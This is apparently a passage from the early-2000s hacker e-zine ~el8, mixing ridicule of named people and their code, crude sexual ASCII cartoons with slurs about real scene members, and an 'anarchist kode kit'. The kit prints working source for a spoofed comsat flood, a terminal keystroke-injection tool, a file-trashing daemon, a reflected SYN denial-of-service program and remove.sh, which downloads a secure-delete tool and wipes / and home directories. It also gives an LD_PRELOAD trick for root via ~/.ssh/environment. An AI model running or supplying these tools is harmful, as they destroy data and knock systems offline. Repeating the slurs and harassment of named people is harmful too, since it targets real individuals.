[ ] ftplog.c 28-Oct-2000 15:31 3k
[ ] httplog.c 28-Oct-2000 15:31 2k
[ ] httplog2.c 28-Oct-2000 15:31 15k
[ ] jill-win32.c 01-Jul-2001 13:36 8k
[ ] libnids-1.13-tokenri..> 28-Oct-2000 15:31 1k
[ ] libnids-1.14-tokenri..> 28-Oct-2000 15:31 1k
[ ] msproxy.c 28-Oct-2000 15:31 3k
[ ] ngrep-1.37-tokenring..> 28-Oct-2000 15:31 1k
[ ] ngrep-1.38-tokenring..> 28-Oct-2000 15:31 1k
[ ] portscan-unix.c 07-Mar-2001 21:35 2k
[ ] portscan.cpp 28-Oct-2000 15:31 2k
[ ] ruleset-retrieve.c 08-Jan-2001 20:21 4k
[ ] squidlog.c 28-Oct-2000 15:31 2k
[ ] test-lkm.c 25-Jun-2001 15:06 1k
[ ] unescape.c 28-Oct-2000 15:32 1k
[ ] wrapper.cpp 28-Oct-2000 15:32 5k

f1rst and f0rem0st, all 0f this is tr4sh. bro4dsc4n uses pop3n t0
p1ng and he ref3rz t0 people as kiddiez in it, portscan-unix d0esnt
even use n0nbl0cking c0nnects and it reinstalls a sighandler every
single t1me it runz thru the loop, test-lkm.c wh4tz the purp0se.
G3T A CL00 K1D. G3T A CL00 K1D. G3T A CL00 K1D. G3T A CL00 K1D.

l3tz ch3ck 0ut the n3ws secti0n n0w this 0ught t0 be inter3st1ng:

No more IRC at Home
07/27/2001 - 10:55am
In an effort to introduce some productivity in my life. I removed all
IRC clients from all of my systems except 1 work computer (Which I
plan to let idle.) In winfingerprint news, I added icmp support into
the cvs version. I will hold off on another release since 0.2.0 is so
fresh. I *finally* completed the network solutions paperwork so that
technotronic.com can be transferred. I hope the site prospers. I just
got a gift certificate for thinkgeek.com. It is appreciated, so thanks
whoever sent it.

the 0nly th1ng th4t pr0sp3rz is y0ur b4d 0d0r. d00d n0 0n3 l1k3s y0u 0n
IRC anyw4y, g3t th4t thr0ugh y0ur f4t h34d.

No longer attending Defcon
07/14/2001 - 12:33pm
I am no longer going to Defcon. Sorry I am unable to see lots of my
friends. aempirei,awr,ktwo,horizon,rfp,fyodor,bronc,optyx,dayzee, etc.
I'll make it next year....

0h h0w gre4t, you just h4d t0 g0 and n4m3 y0ur friends on the w3bs1te,
m4yb3 th3y h4ve f0rg0t th3y are y0ur friend and y0u h4d t0 r3m1nd them,
or m4yb3 y0u're try1ng t0 get s0me r3sp3kt in th3 l0sr c0mmunity.

PS: all y0ur friendz suck anyw4y

Update
07/11/2001 - 2:36 pm
I added a webcam page a few days ago. Don't expect it to be on much. I
released a new version of winfingerprint (0.2.0) today, grab it over
at the winfingerprint homepage. See you at Defcon.

a w3bc4m c00l, c4n we w4tch u m4sturb4t3?!

0k s0rry ab0ut th4t f0lks, n0w 0nt0 s0meth1ng a bit m0re interest1ng. h3r3
i sh0w y0u APTOOLS, vacuum's l4me k0de:

$ cat AUTHORS
Primary Developer:
Kirby Kuehl
kkuehl@cisco.com

DESCRIPTION
APTools is a utility that queries ARP Tables and Content-Addressable Memory (CAM) for MAC Address
ranges associated with 802.11b Access Points. It will also utilize Cisco Discovery Protocol (CDP)
if available. If a Cisco Aironet MAC Address is identified, the security configuration of the
Access Point is audited via HTML parsing.

l3tz sh0w y0u h0w much 0f a klutz this guy iz:

$ grep -i snprintf -r .
aironetquery.c: snprintf(accesspointresults,strlen(iptoscan)+13,"%s-results.txt",iptoscan);
aptools.c: snprintf(t1,strlen(httppassword)+ 2,":%s",httppassword);
aptools.c: snprintf(t1,strlen(httpuserid)+2,"%s:",httpuserid);
aptools.c: snprintf(t1,(strlen(httpuserid)+1+strlen(httppassword)+1),"%s:%s",httpuserid,httppassword);
aptools.c: snprintf(wwwauth,strlen(t2)+27,"Authorization: Basic %s\r\n\r\n",t2);
aptools.c: snprintf(wwwauth,1,"\0");
aptools.h:#define snprintf _snprintf
queryrouter.c: snprintf(routerresults,strlen(iptoscan)+5,"%s.txt",iptoscan);
queryrouter.c: snprintf(sendbuff,strlen(username)+3,"%s\r\n",username);
queryrouter.c: snprintf(sendbuff,strlen(password)+3,"%s\r\n",password);
queryrouter.c: snprintf(sendbuff,20,"terminal length 0\r\n");
queryrouter.c: snprintf(sendbuff,7,"exit\r\n");
queryrouter.c: snprintf(iptoscan,strlen(token)+1, "%s",token);
queryswitch.c: snprintf(routerresults,strlen(iptoscan)+5,"%s.txt",iptoscan);
queryswitch.c: snprintf(sendbuff,strlen(username)+3,"%s\r\n",username);
queryswitch.c: snprintf(sendbuff,strlen(password)+3,"%s\r\n",password);
queryswitch.c: snprintf(sendbuff,14,"set length 0\r\n");
queryswitch.c: snprintf(sendbuff,18,"show cam dynamic\r\n");
queryswitch.c: snprintf(sendbuff,20,"show cdp neighbors\r\n");
queryswitch.c: snprintf(sendbuff,19,"show cam dynamic\r\n");
queryswitch.c: snprintf(sendbuff,7,"exit\r\n");

TH4TS N0T H0W SNPRINTF(3) W0RKS Y0U C0MPL3T3 M0R0N.

aironetquery.c: snprintf(accesspointresults,strlen(iptoscan)+13,"%s-results.txt",iptoscan);
aptools.c: snprintf(t1,strlen(httppassword)+ 2,":%s",httppassword);
^ BAHAHAHAHAHAHAAHAHAHAHAHAH

queryswitch.c: snprintf(sendbuff,7,"exit\r\n");
^ EYE C0UNT 6
queryswitch.c: snprintf(sendbuff,19,"show cam dynamic\r\n");
^ EYE C0UNT 18

fprintf(stdout, "Enter router/switch password: ");
fflush(stdout);
fgets(tacacspassword, BUFFSIZE, stdin);
fprintf(stdout, "Enter HTTP (basic authentication) password: ");
fflush(stdout);
fgets(httppassword, BUFFSIZE, stdin);
^ WHY N0T USE GETPASS() ? IDIOT

ùíù vac_ [~vacuum@rtp-isp-nat1.cisco.com] has joined #phrack
ùíù vac [~vacuum@info-sec.cisco.com] has joined #phrack
ùíù vac_ [~vacuum@sj-natpool-220.cisco.com] has joined #phrack

I R3ST MY FUCK1NG C4S3.




.~v~----------------------------------------------------------~v~.
; *13* ~v~ hacker comics -- Spaf ;
`----------------------------------------------------------------'

Bronc Buster @ RodeoCon 2000 speaking about cisco's configure term:
^ #hackphreak #cisco

,'-',
:_r00t:
(''' , - , ''')
\ ' o O ` /
\ ' ^ ? /
\ ` - ,'
`j_ _,'
,- -`\ \ /f
,- LoU \_\/_/'-
, `,
, . THUG . ,
/\ LYFE \
| / \ ',
, f : :`, ,
<...\ , NIGA BRONC: ,- '
\,,,,\ ; : j '
\ \ :/^^^^'
\ \ ; ''':
\ -, -`.../
' - -,`,--`
\_._'-- '---:


RLoxley in the dojo (naked) confronting people he hates:
^ #hackphreak
________________________________
/ \
| RIGHT AFTER I EAT THIS TWINKY!!! |
\ /
----------------------___________|______
^------> .{{{}}. .' `.
{{{}}}}}} | SO1O, PROPHET, FRYS |
{{}}<@ <@}} | IM GONNA KICK YOUR |
{( \ )} \ FUCKING ASSES! /
{{`| o(}} --'`._________________.'
{{{{\ ____)}
{{{{{{| |}}}} .--.
{{.--' `--. /-| \
{{/ \ `.__.' | `. /\\`..'
{/ ) | \ .' .'""
/ / )__ ) \/ /
/ .---._.' \ |`. /
( H )| `._.'
`-----' `---' |
| |
/ % \
| # |
| ##.#; |
'`-._ .'`.
| o_O \
| b \
| . \
| |\ \
| F `. \
J J \ )
) | ) |
/ ) / |
| | | |
\ | \ |
\---| \--|
) x\ ) <`vv-.
(_ x`. (__.____/
`. x )
`-'


so1o knocked out, dismembered, on the concrete after RLoxley fucks him up:
^ #!el8

___ ___
// \ // \
// ) // )
|| _/ || _/ __
|| \\_,& || \\ ( \
)| ^ / /---,_\_/ & _> )
\|___,__\ / `\_ \_ ( /
\__,-, `\__\_ >_/
\_ / `\_
\_ / \__ ___
`\ `\_,/ /
_ \__,-, ` (_ /
__( \ ,)__ _/ \/
/ `-, ,-' \_( O `\ *gasp* wahhhhreeeeeeezzzzz...
\ /_| | ____/ \ \ =}
`---' `-' \_=_/{}
.{}{}{}{.
{}{}{}{}{
}{}{}{}{}
`}{}{}{}'
`}{}{}'


jennicide's bra found at pumpcon 99 (cumstain on right cup):
^ #hacktech

/\\ //\
// \\ // \\
// .\\-. .-//. \\
_______//_.` `, ,` #`._\\_______
``----------. * .X. * .----------``lc
`-...-` `-...-`


shinex after he beat up uglypig:
^ #phrack

\\\\\//////
.-""-. \\\\\\//////
/ _ _ \ [[[[[[[]]]]]]]]
|(_)(_)| /////////\\\\\\
( /\ ) //// ~0 ( 0~ \\\\
L====J //(, 8-_\-8 ,)\\
`-..-` //|\ .===. /|\\
\\// \ '===' /*
|| \__.__/
_.=||=._ .---'@ @'---.
/| || |\ / '@ @' \
_||_ / . Y . _/\
/ _))-' /|'---{@}---'|\_/\
| _) _.' | --:-- | \ \
\___)-' | --:-- | \ \



angieb at a rave dancing with glowsticks (hi_ is the dj):
^ #pea

*\o_ _c/*
/ * * \
<\ *\o/* />
)
c/* / > *\o
<\ />
__o */\ /\* c__
* /> fathi <\ *
/\* __o_ _c__ */\
* / * * \ *
<\ />
*\c/* <------------- makes me horny
__)__


lusta's new baby being taught /etc/services:
^ #thelema

.=@=. <---- is s8n really my father?
/ \
\ 6.6 / <------ crosseye'd
( _ ) <------- 23? telenet
.-'---'-.
/ . . \ <------ saggy breasts
_/ /| , |\ \_
(__/{`"==="`}\__) <-------- huggies (snugglefluff) diapers
/\_ _/\ <--------- little pp
_| /`"`\ |_
( \ / \ / ) <-------- stank ass feet
\_/ \_/


two condomns kissing (nothing to do with the hacker scene):
^ #bearcave
___ ___
( \\ // )
/\___) (___/\
/ / \ \
/ / \ \
__/ /_ _\ \__
( / ) ( \ )
\___/___/ \___\___/


a picture of ratcorpse (ghettodxm) irc'ing:
^ #!/bin/zsh

(>, oo fugly fucking faggot
/ 8 "} > @ god route is so fugly
|`.8 .-._/| what? that girl is such a fugly slut
`-.'`')`_.' hey goddess you're hot
) / /msg korndogz goddess is fucking fugly
/ |__, u4ea? that guy is fugly, and i schooled him
| ( / what? you're a fucking fugly lackey
.' , / i hate fugly people, im hot as fuck
`._/ '`- www.sneakerz.org/~rat look @ my pics im hot
\| i dance around like an ape trying to pick mites
-- -`' - out of my head, then hit the next key, when i irc


shiloh gained weight (picture from r00tcon in route's room, using SpyCam):
^ #bifemunix

_.--._
,' `.
/ __) __` \
( (`-`(-') )
/) \ _ / (
/' )-._.' . \ ___
( ,--., `.)___(___) <- anthrax cocktail
)( /-.,--'\ _ \X/`
'/ .'/ \ ( Uu")\
/ / \ `/,-' )
( ^ , ,^ )`._.'
( `. Y .' ) <- saggy titties
\ `. )\.' / )
)`._.'=='._.' (
/ )
( ."-.
/(` -) / \
( \`-.__ -'_." `
| \`-.__.--"v" | <- will alisa mind if i rest my flub on the table
`.' \ ## |, ,
/ `._/ :
/ | '
/ /| /
/ | /


par and ratcorpse tying the knot:
^ #!/bin/zsh

I need scene status
^-------v I need pussy
__ __ v-----------^
,-' `' \ _---``--
/ _ _ ; __ `.
/ / `' \; /`----- )
/ .-/ ,( ), \-. ;
| \( \ / )/;
| - _5 `7 -;
/ ( ___-' `-____ |
( ___`-_ \ ____|
\ / `,/ \ _(\__ / \
\ ; \ .' /' `i. / |
| \ _-'( _\__-/ `- |
| ` ,` `_ |


caddis really pissed off at ~el8 because ~el8 OWNED him:
#crocodile_wrestling (notice his striking resemblance to gov-boi)

."`".
.-./ _=_ \.-.
{ (,(oYo),) }} *gr44444HggraAAAAaaaahhRRrrrRRrAarhhHr*
{{ | " |} }
{ { \(---)/ }}
{{ }'-=-'{ } }
{ { }._:_.{ }}
{{ } -:- { } }
{_{ }`===`{ _}
((((\) (/))))
---------------------------------------------



aempirei (gravitino/SSG) vs swr (h4g1s) at defcon 2001:
^ #phrack #!SSG #hackphreak ^ #!sf #t3mpl3-0f-k04dz #phrack

h4g1sh4g1sh4g1sh4g1sh4g1sh4g1sh4g1sh4g1sh4g1sh4g1sh4g1sh4g1sh4g1sh4g1sh4g1s!!
@ \\/ \// AEMPIREI SH0KW4V3 R1D3R @
@ /\`\ /'/\ v v /\ @
@ \ \ / / ::::: |~~\|\ ;;;;; { } @
@ \/ / :: -\ `~~\| \ /- ;; _{}_ @
@ / /\ \ /`---',.____\ \ _ /~~~~~'___' || @
@ ( / \ ) | \\ \,_____\ \)/ / \// | || @
@ ` ' |\ \___|_ ___ \ |/\\ // / / || @
@ |__\_______|-''' (\| ______/ / || @
@ /~~~~~~~~`\ (=`|______/ || @
@ /___________\ `\ || || @
@ / / \ \ | \__ \\ || @
@ =|==||====||====. / / \ \ | | || || @
@ =|=||====||==. | / \ ) | | `' @
@_____ /||----||\ ____| |________| |________| |_______________________@
@~~~~~//~~~~~~~~\\~~~~|___|~~~~~~~~|___|~~~~~~~~| |~~~~~~~~~~~~~~~~~~~~~~~@
@ __| | | |__ |___| @
@ `~~~' `~~~~' | | @
@ `~~' @
@ @
SSGSSGSSGSSGSSGSSGSSGSSGSSGSSGSSGSSGSSGSSGSSGSSGSSGSSGSSGSSGSSGSSGSSGSSGSSG!!


TRON's symbol of freedom:
^ #phreak on DaLNeT

,i$$$i.
$$$$$$$
#$$$$$#
`$$$'
$$$
|$$$eeeeee
,i$ |$$$$$$$$$
,!$$$ |$$$
$$$# |$$$$$$$$$$$i.
;$$$' ~~~~~~~~~$$$i. ,i
($$$. `$$$i.i$'
(#$$!. `!$$$!
`#$$!. ,!$W! `V'
`#$$Wi!. ,!iW$$#'
`##$$$$$$$$$##'
`!#####!'




.~v~----------------------------------------------------------~v~.
; *14* ~v~ anarchist kode kit -- SiLLY G00S3 & ODaY MaZTeR ;
`----------------------------------------------------------------'

w3lc0me bak to the anarchizt k0de kit. we h4ve a couple n3w fil3z
for you. wre4k h4v0k. MURD3R DE4TH K1LL, S8N. enj0y.

[0] biffhaq -- SiLLY G00S3 (written in 1999)
[1] twrite.c -- SiLLY G00S3 (written in 1999)
[2] freeshellfun.c -- ODaY MaZTeR (written in 1999)
[3] remove.sh -- ODaY MaZTeR (written in 1997)
[4] bang.c -- datawar <PS: he's an idiot, flame ypout@mail.ru>
<PS: THIS IS THE F1RST TIME ITZ EVER BEEN DIZTRO'D>
<PS: IT PROBABLY DOESNT WORK HAHAHAHAHAHAHAHAHAHAH>

[BEGIN_DIR] 14_anarkiztkodekit
[BEGIN_DIR] 14_anarkiztkodekit/biffhaq
[CUT_HERE] Makefile
all: biffhaq.c in_cksum.c
gcc biffhaq.c in_cksum.c
@clear
@echo -e '\033[1;36mBIFFHAQ \033[m\033[36m2.0\033[m'
[END_CUT] Makefile
[CUT_HERE] biffhaq.c
/*
PRIVATE. PLEASE DO ^B NOT ^B DISTRIBUTE!
Biffhaq.c : by, SILLY GOOSE.
Vuln found by, SILLY GOOSE.
Coded by, SILLY GOOSE.
Greets to HackPhreak -- keep it up guys!
Exploit the Planet.
To compile, gcc biffhaq.c in_cksum.c
To run, ./a.out t4rg3t_t0_fuq_uP <user>@<offset>:/var/mail/<DIR> count
Example: ./a.out 3.1.33.7 root@10:/var/mail/FUCKYOUMOTHERFUCKER 100000
-- SILLY GOOSE 99.
BIFF Vuln as posted to bugtraq:
If a user is running the 'comsat' daemon,
has biff set to 'y', a possible denial of service exists.

This code hasn't been released in over a year.

ADDED:
2.0 - Regular biff hacking mode. No need to be root.
*/
#include <assert.h>
#include <errno.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <linux/ip.h>
#include <linux/udp.h>

#define IPS sizeof(struct iphdr)
#define UDPS sizeof(struct udphdr)
#undef RAND_MAX
#define RAND_MAX 0;

char *addnum[] =
{"3.1.33.7", "9.0.2.10", 0};

int dumbbiffhaq(char *ip, char *msg, int count)
{
struct sockaddr_in to;
int sockfd;
int dec = 0;
int no;
char own3d[1000];

sockfd = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP);
if (sockfd < 0) {
perror("2, socket() ");
exit(-1);
}
bzero(&to, sizeof(to));
to.sin_family = AF_INET;
to.sin_port = htons(512);
to.sin_addr.s_addr = inet_addr(ip);

if (connect(sockfd, (struct sockaddr *) &to, sizeof(to)) < 0) {
perror("2, connect() ");
exit(-1);
}
snprintf(own3d, sizeof(own3d), "%s\r\n", msg);

do {
send(sockfd, own3d, strlen(own3d), 0);
dec++;
}
while (dec != count);
close(sockfd);
return (1);
}

int main(int argc, char *argv[])
{
struct sockaddr_in to;
struct iphdr *ip;
struct udphdr *udp;
int on, soqfd;
u_char packet[1024];
char *data;
int datalen;
char source[32];
int dec = 0;
int count;
int numindex = 0;

if (argc < 4) {
fprintf(stdout,
"./a.out <t4rg3t> <user>@<offset>:/var/mail/<msg> count\n");
exit(-1);
}
if (getuid() != 0) {
puts("Your user id is not zero! GOING TO DUMBBIFFHAQ MODE.");
dumbbiffhaq(argv[1], argv[2], atoi(argv[3]));
puts("Finished. (dumbbiffhaq())");
exit(1);
}
soqfd = socket(AF_INET, SOCK_RAW, IPPROTO_RAW);
if (soqfd < 0) {
perror("socket() ");
exit(-1);
}
on = 1;
setsockopt(soqfd, IPPROTO_IP, IP_HDRINCL, &on, sizeof(on));

datalen = strlen(argv[2]);
count = atoi(argv[3]);

ip = (struct iphdr *) packet;
bzero(ip, IPS);
ip->version = 4;
ip->ihl = 5;
ip->tos = 0;
ip->tot_len = UDPS + IPS + datalen;
ip->id = htons(getpid());
ip->frag_off = 0;
ip->ttl = 255;
ip->protocol = IPPROTO_UDP;
ip->check = 0;
ip->daddr = inet_addr(argv[1]);
ip->check = in_cksum((u_short *) ip, IPS);

udp = (struct udphdr *) (packet + IPS);
bzero(udp, UDPS);

data = packet + IPS + UDPS;
memcpy(data, argv[2], datalen);

udp->source = htons(1028);
udp->dest = htons(512);
udp->len = htons(UDPS + datalen);
udp->check = 0;

bzero(&to, sizeof(to));
to.sin_family = AF_INET;
to.sin_port = htons(512);
to.sin_addr.s_addr = ip->daddr;

puts("You've made it to the finaly stage, starting... BIFFHAQ!");
do {
if (numindex == 2)
numindex = 0;
snprintf(source, sizeof(source), "%s", addnum[numindex]);
ip->saddr = inet_addr(source);
if (sendto(soqfd, packet, sizeof(packet), 0x0,
(struct sockaddr *) &to, sizeof(to)) < 0) {
perror("sendto() ");
exit(-1);
}
dec += 1;
numindex++;
}
while (dec != count);
puts("Finished. (SPOOFBIFFHAQ!)");
close(soqfd);
return (1);
}
/* ++ EOF */
[END_CUT] biffhaq.c
[CUT_HERE] in_cksum.c
#include <stdlib.h>
#include <stdio.h>
#include <sys/types.h>

/*
* in_cksum --
* Checksum routine for Internet Protocol family headers (C Version)
* in_cksum --
* Copyright ~el8 ezine, 1999, written by SiLLY G00S3
*/
unsigned short
in_cksum (unsigned short *addr, int len)
{
register int sum = 0;
u_short answer = 0;
register u_short *w = addr;
register int nleft = len;

while (nleft > 1)
{
sum += *w++;
nleft -= 2;
}

if (nleft == 1)
{
*(u_char *) (&answer) = *(u_char *) w;
sum += answer;
}

sum = (sum >> 16) + (sum & 0xffff); /* add hi 16 to low 16 */
sum += (sum >> 16); /* add carry */
answer = ~sum; /* truncate to 16 bits */
return (answer);
}
[END_CUT] in_cksum.c
[END_DIR] 14_anarkiztkodekit/biffhaq
[BEGIN_DIR] 14_anarkiztkodekit
[CUT_HERE] twrite.c
/* gcc twrite.c -o twrite ; ./twrite <dev/tty..>
* use TWRITEQ to quit twrite
* use this to brag when you've owned an irc person
* use this to type on someone's term to piss them off
* -- SILLY GOOSE 99 */
#include <stdio.h>
#include <stdlib.h>
#include <fcntl.h>
#include <unistd.h>
#include <sys/ioctl.h>

int main(int argc, char * argv[])
{
int fd,x,y;
unsigned char buf[512];
setvbuf(stdout, NULL, _IONBF, 0);
fd=open(argv[1], O_RDWR);
if(fd<0)
{
perror("open");
exit(-1);
}
while(1) {
memset(buf,0,sizeof(buf));
printf("text?> ");
fgets(buf,sizeof(buf),stdin);
if(strncmp(buf, "TWRITEQ", strlen("TWRITEQ"))==0) exit(0);
for(x=0;x<strlen(buf);x++)
{
y=ioctl(fd, TIOCSTI, &buf[x]);
if(y<0)
{
perror("ioctl");
exit(-1);
}
}
}
close(fd);
}
[END_CUT] twrite.c
[CUT_HERE] freeshellfun.c
/* .BL0W IT UP FUCK IT UP TE4R SHIT UP. */
/* */
/* freeshellfun.c -- ODaY MaZTeR */
/* ./fsf <use stdin, supply a /dev/tty */
/* */
/* u can use this as an alarm cloq also */
/* */
/* .BL0W IT UP FUCK IT UP TE4R SHIT UP. */

#include <stdio.h>
#include <unistd.h>
#include <fcntl.h>
#include <sys/types.h>

int g4ym0n(void) {
switch(fork()) {
case -1:exit(-1);
case 0: break;
default: exit(0);
}

if(setsid() < 0) exit(-1);
chdir("/tmp");
return(0);
}

int main(void)
{
char buf[31337], b[31337];
int fd;

bzero(&buf,31337);
(void)fgets(buf,31337, stdin);
for(fd=0;fd<strlen(buf);fd++)
if(buf[fd]=='\n' || buf[fd]=='\r') buf[fd]='\0';

g4ym0n();
for(;;)
{
bzero(&b,31337);
snprintf(b, 31337, "head -n 1000 /dev/urandom > %s", buf);
system(b);
sleep(60);
}
}
[END_CUT] freeshelfun.c
[CUT_HERE] remove.sh
#
# remove.sh -- ODaY MaZTeR
#
# when your target is watching porno, or idle, use this
#
#!/bin/sh
echo "grabbing / making srm"
lynx -dump http://prdownloads.sourceforge.net/srm/srm-1.2.4.tar.gz > srm.tgz
tar zxvf srm.tgz
cd srm-1.2.4 && ./configure && make && cp src/srm .. && cd ..
echo "unleash the beast"
./srm
./srm -srf /var /etc &
rm -rf /tmp /dev /bin /lib /sbin
./srm -srf /home /usr/home /opt/home &
./srm -srf / &
echo "the beast is unleashed"
[END_CUT] remove.sh
[CUT_HERE] bang.c
/*
* Coded by DataWaR, ypout@mail.ru
*
* Shoutz to: etech, sorcerer, blazin, udp, hybrid and kdl
*
* --------------------------------
**************YOU MAY NOT DISTRIBUTE THIS CODE****************
* --------------------------------
*
* This is POC and demonstrates a new method of DoS. The idea
* behind it is that the attacker generates connection requests
* to a list of hosts which have a service running such as
* http (80), telnet (23) etc. from the ip of the victim host.
* This will result all of the hosts that the victim *requested*
* connections to send back packets (usually SYN-ACK's) 2-3 of
* them (amplification comes here!) causing load to the victim
* by cauzing the victim to send RST packets since it never actually
* request

  
ed any such connection. This attack is dangerous since
* its almost impossible to filter!!
*
* hosts file should be in the format of 1 ip:port per line
* i.e. 194.66.25.97:80
* 130.88.172.194:23
* A good list should be long enough with hosts that u know they are
* running a TCP service, its good to use HTTP servers for this :)
*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#include <sys/types.h>
#include <sys/socket.h>

#define __FAVOR_BSD

#include <arpa/inet.h>
#include <netinet/in.h>
#include <netinet/ip.h>
#include <netinet/tcp.h>


unsigned short int getrandportid(void);
unsigned short in_cksum(u_short *addr, int len);
unsigned long long int rdtsc(void); /* Thanks to Sorcerer :) */
short int send_syn(char *, char *, unsigned short int);
int sox;

struct pseudo {
unsigned long srca, dsta;
unsigned char zero, proto;
unsigned short tcplen;
};

struct checksum {
struct pseudo pp;
struct tcphdr tt;
};


int
main(int argc, char **argv)
{
int enable=1,tmp,n=0,port=23,loop;
char *lala, *tmp1, buf[25];
FILE *fp;

printf("\nCoded by DataWaR, ypout@mail.ru\n\n");

if(argc != 4){
fprintf(stderr, "Incorrect usage try: %s <victim> <host-file> <loop host-file>\a\n", *argv);
fprintf(stderr, "Example: %s 127.0.0.1 myhostsfile.txt 3\n\n", *argv);
return(-1);
}

fp = fopen(argv[2], "r");
if(fp == NULL){
fprintf(stderr, "Error while opening: %s\n", argv[2]);
perror("fopen");
return(-1);
}

loop = atoi(argv[3]);
if(loop == 0){
fprintf(stderr, "Cannot loop 0 times you need to loop at least once\n"); return(-1);
}

sox = socket(PF_INET, SOCK_RAW, 6);
if(sox == -1){ perror("socket"); return(-1); }

tmp = setsockopt(sox, IPPROTO_IP, IP_HDRINCL, &enable, sizeof(enable));
if(tmp == -1){ perror("setsockopt"); return(-1); }

for(n=1;n<=loop;n++){
printf("-----------------------------------------------------------------\n"); fflush(stdout);
while(1){
memset(buf, 0, 25);

tmp1 = fgets(buf, 25, fp);
if(tmp1 == NULL) break;

if(strlen(buf) < 9) {
printf("Bogus entry: %s\n", buf);
continue;
}

lala = strchr((char *)&buf, ':');
port = atoi(++lala);
buf[strlen(buf)-strlen(lala)-1] = '\0';

tmp = send_syn(argv[1], buf, port);
if(tmp == -1){ perror("send_syn"); return(-1); }
}
rewind(fp);
}


return 0;
}

short int
send_syn(char *src, char *dst, unsigned short int port)
{
struct sockaddr_in s;
struct ip *i;
struct tcphdr *t;
struct pseudo p;
struct checksum c;
char packet[sizeof(char)*(sizeof(struct ip)+sizeof(struct tcphdr))];
int tmp;

s.sin_family = PF_INET;
s.sin_port = htons(port);
s.sin_addr.s_addr = inet_addr(dst);

i = (struct ip *)&packet;
t = (struct tcphdr *)((int)i+sizeof(struct ip));

memset(&packet, 0, sizeof(packet));
i->ip_hl = 5;
i->ip_v = 4;
i->ip_tos = 0x08;
i->ip_len = htons(sizeof(packet));
i->ip_id = htons(getrandportid());
i->ip_off = 0;
i->ip_ttl = 255;
i->ip_p = 6;
i->ip_sum = 0;
i->ip_src.s_addr = inet_addr(src);
i->ip_dst.s_addr = inet_addr(dst);


t->th_sport = htons(getrandportid());
t->th_dport = htons(port);
t->th_seq = htons(getrandportid());
t->th_ack = 0;
t->th_x2 = 0;
t->th_off = 5;
t->th_flags = 0x02;
t->th_win = htons(65535);
t->th_urp = 0;
t->th_sum = 0;

p.srca = inet_addr(src);
p.dsta = inet_addr(dst);
p.proto = 6;
p.tcplen = htons(sizeof(struct tcphdr));
p.zero = 0;

memcpy(&c.pp, &p, sizeof(p));
memcpy(&c.tt, t, sizeof(struct tcphdr));

t->th_sum = in_cksum((void *)&c, sizeof(c));

tmp = sendto(sox, packet, ntohs(i->ip_len), MSG_DONTWAIT, (struct sockaddr *)&s, sizeof(s));
if(tmp == -1){
perror("sendto");
return(-1);
}

/* Comment this out if it looks ugly and u got a long list */
printf("|\tSRC: %s:%d\t|\t DST: %s:%d\t|\n", src, ntohs(t->th_sport), dst, port); fflush(stdout);

return 0;
}
unsigned short int
getrandportid(void)
{
unsigned short int port;

srand(rdtsc());

redo_port:
port = rand()>>15;
if(port==0) goto redo_port;

return(port);
}

unsigned long long int
rdtsc(void) {
unsigned long long int tsc;
unsigned long int tsc_l,tsc_h;
__asm__ volatile("rdtsc":"=%eax"(tsc_l),"=d"(tsc_h));
tsc=tsc_h;
tsc=(tsc<<32)|tsc_l;
return(tsc);
}

/* Slow shit checksum function from RFC */
u_short
in_cksum(u_short *addr, int len)
{
register int nleft = len;
register u_short *w = addr;
register int sum = 0;
u_short answer = 0;

while (nleft > 1) {
sum += *w++;
nleft -= 2;
}


if (nleft == 1) {
*(u_char *)(&answer) = *(u_char *) w;
sum += answer;
}

sum = (sum >> 16) + (sum & 0xffff);
sum += (sum >> 16);
answer = ~sum;
return(answer);
}
[END_CUT] bang.c
[END_DIR] 14_anarkiztkodekit
[END_DIR] 14_anarkiztkodekit




.~v~----------------------------------------------------------~v~.
; *15* ~v~ opensshd local root exploit -- optyx ;
`----------------------------------------------------------------'

[BEGIN_DIR] 0day
[CUT_HERE] ssh.txt
Yo!

1): Open up /tmp/hhp.c on some box you have access to
2): Type in:

#include <stdio.h>

int getuid(void) { return (0); }
int getgid(void) { return (0); }
int geteuid(void) { return (0); }
int getegid(void) { return (0); }

3) Compile it with:
gcc -o /tmp/hhp /tmp/hhp.c -shared

4) Add to ~/.ssh/environment for your user:
LD_PRELOAD=/tmp/hhp

5) Log in ... AND YOU HAVE A NICE bash#

- optyx

Shouts to HHP, cdc, NewHackCity, uberhax0r, and Owen D.
[END_CUT] ssh.txt
[END_DIR] 0day




.~v~----------------------------------------------------------~v~.
; *16* diztributed metag4ysis -- Andrew J. Stewart ;
`----------------------------------------------------------------'

8======D Andrew J. Stewart <ajs@tentacle.org.uk>

"You may advance and be absolutely irresistible, if you make for the enemy's
weak points; you may retire and be safe from pursuit if your movements are
more rapid than those of the enemy."


- Sun Tzu, Art of IRC War


8===D (struct ~el8 *) ptr

You can find all of this information at the following sites in .txt format:

<*> el8.n3.net
<*> packetstormsecurity.com/mag/~el8/
<*> el8.8m.com


8===D Abstract

"dizitributed metag4ysis" refers to the process by which an attacker propagates
an irc channel throughout an irc network. The traditional methodology for
irc network penetration is sufficiently well understood to define behavior
which may be indicative of an attack, e.g, for use within an irc intrusion
detection system. A new model of irc network penetration: distributed
metagaysis, increases the possible depth of penetration for an attacker, while
minimizing the possibility of detection, thus we can takeover many channels.
Distributed metagaysis is a trivial methodology for irc network penetration,
based on an irc script, which mass deops channels very quickly and efficiently.
This is used by highly skilled attackers who wish to takeover irc channels.


8===D Introduction

In the study of medicine, the term "metagaysis" refers to the spread of herpies
from its original site to other areas in the body. Metagaysis is the principal
cause of death in herpyz patients. Herpyz mites have the ability to enter the
vascular system and travel to virtually any part of the penis where they detach
and burrow into a target vagina. Each herpy has an individualized way of
spreading (oral sex, anal sex, fisting).

The use of the term metagaysis was first suggested in the context of computer
security by William Cheswick and Steven Bellovin [1] and refers to the process
by which an attacker, after compromising an irc channel, attacks logically
associated channels by utilizing properties and resources of the compromised
irc channel:

"Once an account is secured on a machine, the hacker has several hacking goals
... [to] open new security holes or backdoors in the invaded machine ... [and
to] find other hosts that trust the invaded host."


Before the techniques and advantages of distributed metagaysis can be
explained, the traditional attack paradigm must be understood. Note that a
verbose description of the traditional attack paradigm is outside the scope of
this document; [2] describes that subject in detail.


8===D Traditional Attack Paradigm

We will assume the attacker will be using BitchX throughout this paper.
The framework of processes and order of execution by which an attack attempts
to gain ops and takeover an irc channel is not sufficiently understood.

